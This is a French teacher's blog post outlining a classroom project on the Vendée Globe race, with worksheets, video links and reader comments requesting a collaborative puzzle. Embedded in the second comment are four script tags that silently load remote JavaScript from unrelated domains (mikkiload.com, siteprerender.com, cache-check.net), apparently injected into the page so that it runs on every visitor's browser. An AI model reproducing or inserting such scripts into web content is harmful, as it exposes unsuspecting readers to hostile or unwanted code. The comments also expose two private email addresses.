• Projet vendée globe

    Comme beaucoup d'entre vous, je me lance dans l'aventure du Vendée globe. Ca tombe bien notre projet d'école tourne autour du Tour du monde. Ce sera la fabuleuse excuse de faire le tour du monde tout en explorant d'autres pistes avec le Vendée globe. 

    Projet vendée globe

     

    Tout d'abord , nous nous lancerons avec un petit brain storming pour savoir ce qu'ils connaissent sur le Vendée globe et tout ce qui est en lien: les sponsors, le vocabulaire sur le monocoque etc.. 

    Je noterai tout sur une affiche puis nous poursuivrons avec la vidéo : un jour une question , dispo sur youtube: C'est quoi le Vendée globe? et distribution du questionnaire en lien avec la vidéo :  Télécharger « questionnauire un jour une question.pdf »

     

    Dans une autre séance , je proposerai de visualiser les 33 skippers en liste par le biais du Powerpoint que j'ai construit ici: Présentation skipper puis un tirage au sort pour chaque élève et mettre leur bateau sur la ligne de départ. Pour cela , j'ai repris ce que proposait des enseignants sur le groupe facebook : vendée globe à l'école ou vendée globe cycle 2 .. 

    En sciences je vais surement partir sur ma séquence faite il y a deux ans , en lien avec les animaux marins  , vous pouvez la retrouver en cliquant sur le lien :  ici

    Pour le vocabulaire, je vais d'abord partir d'une vidéo : Vocabulaire des skippers et compléter la fiche sur le voilier : Vocabulaire voilier (dispo sur le site : ici ) . Je vais leur faire construire un imagier ou un dictionnaire de la mer. 

    J'ai ensuite repris les ressources proposées sur le blog pour créer des fiches à ma sauce : 

    Télécharger « comparaison vie skipper vie eleve.pdf »

    Télécharger « mots croisés vendee globe.pdf »

    Télécharger « animaux marins.pdf »

     

    Vous pouvez aussi vous servir de mes roues pour compter les jours : 

    Télécharger « compteur .pdf »

     

    Pleins de ressources sur différents sites: 

    Activités pour les élèves : 

    Site calameo

    Vidéo avec les skippers: 

    Les petits reporters

     

    Construction d'un bateau à voile : 

    Mômes.net

    Les blogs sympas sur le thème: 

    Bout de gomme (évidemment)

    Gomme et gribouillages (pleins de ressources que j'aime beaucoup) 

    Initiatives

    Charivari

    Ipotame

     

    Projet vendée globe

     

     Vous pouvez retrouver d'autres ressources dans la rubrique : vendée globe sur le blog ;) 

     

    Un super puzzle à télécharger sur le groupe facebook :

    Projet vendée globe

    Crédit: Elodie P. 

    Pin It

    Tags Tags : , , , , , , ,
  • Commentaires

    1
    Mercredi 21 Octobre 2020 à 00:12

    Merci pour cet article et ces ressources :)

    Au besoin tu peux peut-être utiliser mes abécédaires, notamment celui spécifique au VG ;)

     

    2
    Marie81
    Jeudi 22 Octobre 2020 à 10:44

    Bonjour

    Tout d'abord un grand merci pour le partage de vos ressources! J'ai découvert votre site avec l'orthographe et l'entrée graphémique : une vrai mine d'or!

    Je voulais me lancer avec ma classe de CE sur le Vendée Globe (grande 1ère pour moi), je vois partout des classes s'inscrire sur le Virtual Regatta, mais je ne sais pas trop, cela me paraît un peu compliqué avec des CE1. Quel est votre avis? L'avez vous déjà fait?

    Merci encore

    <script src="//mikkiload.com/2299156fcd9f4015b0.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1603356156204" type="text/javascript"></script> <script src="http://mikkiload.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    3
    marv
    Vendredi 30 Octobre 2020 à 10:16

    Un grand grand merci pour tout ce dossier, je me lance moi aussi dans l'aventure cette année pour la première fois avec mes ce2 et tes documents vont bien compléter ce que j'ai préparé. Je trouve l'idée du puzzle très sympathique avec l'idée de créer quelque chose de collectif par contre je n'ai pas de compte facebook donc je ne sais pas comment trouver ce document...

    4
    lunievert
    Lundi 28 Décembre 2020 à 16:53

    bonjour

    serait il possible de recevoir le lien pour le planisphère à colorier sans passer par FB? merci bcp

    Bravo pour ton travail

    5
    Sidonie
    Lundi 8 Février 2021 à 18:55

    Quelle belle découverte ce soir. 

    Votre blog est super! beaucoup de bonnes idées. J ai adoré notamment votre planisphère à faire en collectif. Par contre je n ai pas FB. Pourriez vous me le faire parvenir? ou un lien? Un grand merci d'avance! J adore cette idée de puzzle! GENIAL!

    Mille mercis

    Sidonie

      • Lundi 8 Février 2021 à 20:16

        Merci beaucoup de ton commentaire ; peux tu m'envoyer un email à mmevalancourt@outlook.fr pour te le faire parvenir :) 

    6
    Sidonie
    Lundi 8 Février 2021 à 18:59

     

    Votre blog est génial. Auriez vous la gentillesse de m'envoyer le lien pour le puzzle géant à faire en collectif. IL est génial. Un grand merci par avance. Sidonie admirative de tout votre travail. et Merci pour le partage

     

    Bonne soirée

    7
    Sidonie
    Lundi 8 Février 2021 à 19:00

    Votre blog est génial. Auriez vous la gentillesse de m'envoyer le lien pour le puzzle géant à faire en collectif. IL est génial. Un grand merci par avance. Sidonie admirative de tout votre travail. et Merci pour le partage

     

    Bonne soirée

    8
    Sidonie
    Lundi 8 Février 2021 à 19:00

    Votre blog est génial. Auriez vous la gentillesse de m'envoyer le lien pour le puzzle géant à faire en collectif. IL est génial. Un grand merci par avance. Sidonie admirative de tout votre travail. et Merci pour le partage

     

    Bonne soirée

    9
    carined
    Jeudi 18 Février 2021 à 23:02

    Un grand MERCI pour toutes ces idées et les documents partagés. Le puzzle me plait beaucoup, pourriez vous me l'envoyer? Merci encore.

    10
    Hélène
    Mardi 31 Août 2021 à 16:06

    Bonjour, 

    Magnifique puzzle, pourrai tu me l'envoyer par mail boussettahelene@gmail.com ou me donner le nom du groupe FB stp :) 

    Merci 

    Hélène

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :